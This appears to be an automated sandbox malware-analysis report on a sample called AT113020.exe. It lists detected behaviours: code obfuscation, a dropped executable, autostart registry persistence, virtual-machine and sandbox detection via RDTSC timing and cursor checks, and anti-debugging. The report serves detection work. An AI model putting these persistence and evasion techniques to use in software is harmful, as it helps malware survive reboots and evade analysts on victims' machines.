Source: AT113020.exe Static file information: File size 1375232 > 1048576
Source: Binary string: ieinstal.pdbGCTL source: msdt.exe, 00000008.00000002.1016655468.00000000006E4000.00000004.00000020.sdmp
Source: Binary string: msdt.pdbGCTL source: ieinstal.exe, 00000006.00000002.293259484.0000000004C90000.00000040.00000001.sdmp
Source: Binary string: ieinstal.pdb source: msdt.exe, 00000008.00000002.1016655468.00000000006E4000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: ieinstal.exe, 00000002.00000002.292827660.000000000352F000.00000040.00000001.sdmp, ieinstal.exe, 00000006.00000002.285564970.0000000003050000.00000040.00000001.sdmp, msdt.exe, 00000008.00000002.1020258027.000000000473F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000003.285864876.00000000028B0000.00000004.00000001.sdmp, ieinstal.exe, 00000010.00000002.293780626.000000000332F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ieinstal.exe, msdt.exe, 00000008.00000002.1020258027.000000000473F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000003.285864876.00000000028B0000.00000004.00000001.sdmp, ieinstal.exe, 00000010.00000002.293780626.000000000332F000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdb source: ieinstal.exe, 00000002.00000002.294312378.0000000005110000.00000040.00000001.sdmp
Source: Binary string: msdt.pdb source: ieinstal.exe, 00000006.00000002.293259484.0000000004C90000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL source: ieinstal.exe, 00000002.00000002.294312378.0000000005110000.00000040.00000001.sdmp

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0048ADC8 GetBkColor,GetDC,GetROP2,GetROP2,GetBkMode,GetMapMode,VirtualAlloc,VirtualAlloc,GetDCBrushColor,LoadLibraryA,GetProcAddress,GetProcAddress,GetPolyFillMode,GetTextAlign,GetPolyFillMode,VirtualProtect,GetGraphicsMode,GetDC,GetPolyFillMode,GetDC,GetTextAlign,GetPixelFormat,GetDC,GetPixelFormat, 1_2_0048ADC8
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0048D0AC push 0048D125h; ret 1_2_0048D11D
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004194F8 push ecx; mov dword ptr [esp], edx 1_2_004194FD
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0048D5D0 push 0048D65Dh; ret 1_2_0048D655
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00460068 push 00460094h; ret 1_2_0046008C
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0046E088 push 0046E0E2h; ret 1_2_0046E0DA
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0048C230 push 0048C256h; ret 1_2_0048C24E
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0047C358 push 0047C384h; ret 1_2_0047C37C
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0042638C push 004263B8h; ret 1_2_004263B0
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00450484 push ecx; mov dword ptr [esp], ecx 1_2_00450488
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00474568 push 004745DEh; ret 1_2_004745D6
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004425EC push 00442638h; ret 1_2_00442630
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00488600 push 0048864Ch; ret 1_2_00488644
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0040E61A push 0040E926h; ret 1_2_0040E91E
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00430618 push 004306E8h; ret 1_2_004306E0
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0041875E push 6C0041CCh; iretd 1_2_0041877D
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004167E8 push 0041685Eh; ret 1_2_00416856
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0040E7A0 push 0040E926h; ret 1_2_0040E91E
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00424816 push 004248C3h; ret 1_2_004248BB
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00424818 push 004248C3h; ret 1_2_004248BB
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004268D0 push 00426913h; ret 1_2_0042690B
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004068D2 push 0040692Fh; ret 1_2_00406927
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004068D4 push 0040692Fh; ret 1_2_00406927
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0043A91C push 0043A95Fh; ret 1_2_0043A957
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004729E0 push 00472A13h; ret 1_2_00472A0B
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0045CC0C push 0045CC72h; ret 1_2_0045CC6A
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00488CB8 push 00488D3Ah; ret 1_2_00488D32
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00426E80 push 00426EC3h; ret 1_2_00426EBB
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00449050 push 004490BBh; ret 1_2_004490B3
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_004390CC push 00439104h; ret 1_2_004390FC
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0040F0F0 push 0040F11Ch; ret 1_2_0040F114
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0048D144 push 0048D1ECh; ret 1_2_0048D1E4

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\AT113020.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe

Boot Survival:

Creates autostart registry keys with suspicious names
Source: C:\Users\user\Desktop\AT113020.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf
Creates multiple autostart registry keys
Source: C:\Windows\SysWOW64\msdt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7NF4IRG0T
Source: C:\Users\user\Desktop\AT113020.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf
Source: C:\Users\user\Desktop\AT113020.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf
Source: C:\Users\user\Desktop\AT113020.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Accf
Source: C:\Windows\SysWOW64\msdt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7NF4IRG0T
Source: C:\Windows\SysWOW64\msdt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 7NF4IRG0T

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0046B900 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 1_2_0046B900
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0046C030 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA, 1_2_0046C030
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0046C0F4 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus, 1_2_0046C0F4
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00468398 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow, 1_2_00468398
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00456848 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 1_2_00456848
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_00457218 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 1_2_00457218
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_0046B900 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 5_2_0046B900
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_0046C030 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA, 5_2_0046C030
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_0046C0F4 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus, 5_2_0046C0F4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_00468398 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow, 5_2_00468398
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_00456848 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 5_2_00456848
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_00457218 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 5_2_00457218
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_00425E44 IsIconic,GetWindowPlacement,GetWindowRect, 5_2_00425E44
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_00455F40 IsIconic,GetCapture, 5_2_00455F40
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0045C27C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode, 1_2_0045C27C
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe RDTSC instruction interceptor: First address: 000000000040876E second address: 0000000000408774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 00000000001483D4 second address: 00000000001483DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 00000000026183D4 second address: 00000000026183DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 000000000014876E second address: 0000000000148774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 000000000261876E second address: 0000000002618774 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_004086A0 rdtsc 2_2_004086A0
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\user\Desktop\AT113020.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 1_2_0046AB64
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 5_2_0046AB64
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 8.1 %
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe API coverage: 6.3 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 6532 Thread sleep time: -225000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: 5_2_00405DBC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 5_2_00405DBC
Source: explorer.exe, 00000003.00000000.256798347.000000000891C000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287726771.00000000008C1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWTI8
Source: explorer.exe, 00000003.00000002.1016614721.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000003.00000000.256859188.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.251940786.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.256859188.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000003.00000000.256454933.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe API call chain: ExitProcess graph end node
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_004086A0 rdtsc 2_2_004086A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_00409900 LdrLoadDll, 2_2_00409900
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0048ADC8 GetBkColor,GetDC,GetROP2,GetROP2,GetBkMode,GetMapMode,VirtualAlloc,VirtualAlloc,GetDCBrushColor,LoadLibraryA,GetProcAddress,GetProcAddress,GetPolyFillMode,GetTextAlign,GetPolyFillMode,VirtualProtect,GetGraphicsMode,GetDC,GetPolyFillMode,GetDC,GetTextAlign,GetPixelFormat,GetDC,GetPixelFormat, 1_2_0048ADC8
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0343DB40 mov eax, dword ptr fs:[00000030h] 2_2_0343DB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03508B58 mov eax, dword ptr fs:[00000030h] 2_2_03508B58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0343F358 mov eax, dword ptr fs:[00000030h] 2_2_0343F358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0343DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0343DB60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03463B7A mov eax, dword ptr fs:[00000030h] 2_2_03463B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03463B7A mov eax, dword ptr fs:[00000030h] 2_2_03463B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F131B mov eax, dword ptr fs:[00000030h] 2_2_034F131B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034B53CA mov eax, dword ptr fs:[00000030h] 2_2_034B53CA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034B53CA mov eax, dword ptr fs:[00000030h] 2_2_034B53CA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034603E2 mov eax, dword ptr fs:[00000030h] 2_2_034603E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034603E2 mov eax, dword ptr fs:[00000030h] 2_2_034603E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034603E2 mov eax, dword ptr fs:[00000030h] 2_2_034603E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034603E2 mov eax, dword ptr fs:[00000030h] 2_2_034603E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034603E2 mov eax, dword ptr fs:[00000030h] 2_2_034603E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034603E2 mov eax, dword ptr fs:[00000030h] 2_2_034603E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0345DBE9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F138A mov eax, dword ptr fs:[00000030h] 2_2_034F138A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03441B8F mov eax, dword ptr fs:[00000030h] 2_2_03441B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03441B8F mov eax, dword ptr fs:[00000030h] 2_2_03441B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034ED380 mov ecx, dword ptr fs:[00000030h] 2_2_034ED380
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03462397 mov eax, dword ptr fs:[00000030h] 2_2_03462397
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0346B390 mov eax, dword ptr fs:[00000030h] 2_2_0346B390
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03464BAD mov eax, dword ptr fs:[00000030h] 2_2_03464BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03464BAD mov eax, dword ptr fs:[00000030h] 2_2_03464BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03464BAD mov eax, dword ptr fs:[00000030h] 2_2_03464BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03505BA5 mov eax, dword ptr fs:[00000030h] 2_2_03505BA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03439240 mov eax, dword ptr fs:[00000030h] 2_2_03439240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03439240 mov eax, dword ptr fs:[00000030h] 2_2_03439240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03439240 mov eax, dword ptr fs:[00000030h] 2_2_03439240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03439240 mov eax, dword ptr fs:[00000030h] 2_2_03439240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034FEA55 mov eax, dword ptr fs:[00000030h] 2_2_034FEA55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034C4257 mov eax, dword ptr fs:[00000030h] 2_2_034C4257
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034EB260 mov eax, dword ptr fs:[00000030h] 2_2_034EB260
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034EB260 mov eax, dword ptr fs:[00000030h] 2_2_034EB260
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03508A62 mov eax, dword ptr fs:[00000030h] 2_2_03508A62
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0347927A mov eax, dword ptr fs:[00000030h] 2_2_0347927A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03448A0A mov eax, dword ptr fs:[00000030h] 2_2_03448A0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03435210 mov eax, dword ptr fs:[00000030h] 2_2_03435210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03435210 mov ecx, dword ptr fs:[00000030h] 2_2_03435210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03435210 mov eax, dword ptr fs:[00000030h] 2_2_03435210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03435210 mov eax, dword ptr fs:[00000030h] 2_2_03435210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0343AA16 mov eax, dword ptr fs:[00000030h] 2_2_0343AA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0343AA16 mov eax, dword ptr fs:[00000030h] 2_2_0343AA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03453A1C mov eax, dword ptr fs:[00000030h] 2_2_03453A1C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034FAA16 mov eax, dword ptr fs:[00000030h] 2_2_034FAA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034FAA16 mov eax, dword ptr fs:[00000030h] 2_2_034FAA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03474A2C mov eax, dword ptr fs:[00000030h] 2_2_03474A2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03474A2C mov eax, dword ptr fs:[00000030h] 2_2_03474A2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A229 mov eax, dword ptr fs:[00000030h] 2_2_0345A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A229 mov eax, dword ptr fs:[00000030h] 2_2_0345A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A229 mov eax, dword ptr fs:[00000030h] 2_2_0345A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A229 mov eax, dword ptr fs:[00000030h] 2_2_0345A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A229 mov eax, dword ptr fs:[00000030h] 2_2_0345A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A229 mov eax, dword ptr fs:[00000030h] 2_2_0345A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A229 mov eax, dword ptr fs:[00000030h] 2_2_0345A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A229 mov eax, dword ptr fs:[00000030h] 2_2_0345A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345A229 mov eax, dword ptr fs:[00000030h] 2_2_0345A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03462ACB mov eax, dword ptr fs:[00000030h] 2_2_03462ACB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03462AE4 mov eax, dword ptr fs:[00000030h] 2_2_03462AE4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0346D294 mov eax, dword ptr fs:[00000030h] 2_2_0346D294
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0346D294 mov eax, dword ptr fs:[00000030h] 2_2_0346D294
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034352A5 mov eax, dword ptr fs:[00000030h] 2_2_034352A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034352A5 mov eax, dword ptr fs:[00000030h] 2_2_034352A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034352A5 mov eax, dword ptr fs:[00000030h] 2_2_034352A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034352A5 mov eax, dword ptr fs:[00000030h] 2_2_034352A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034352A5 mov eax, dword ptr fs:[00000030h] 2_2_034352A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0344AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0344AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0344AAB0 mov eax, dword ptr fs:[00000030h] 2_2_0344AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0346FAB0 mov eax, dword ptr fs:[00000030h] 2_2_0346FAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345B944 mov eax, dword ptr fs:[00000030h] 2_2_0345B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0345B944 mov eax, dword ptr fs:[00000030h] 2_2_0345B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0343C962 mov eax, dword ptr fs:[00000030h] 2_2_0343C962
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0343B171 mov eax, dword ptr fs:[00000030h] 2_2_0343B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0343B171 mov eax, dword ptr fs:[00000030h] 2_2_0343B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03439100 mov eax, dword ptr fs:[00000030h] 2_2_03439100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03439100 mov eax, dword ptr fs:[00000030h] 2_2_03439100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03439100 mov eax, dword ptr fs:[00000030h] 2_2_03439100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03454120 mov eax, dword ptr fs:[00000030h] 2_2_03454120
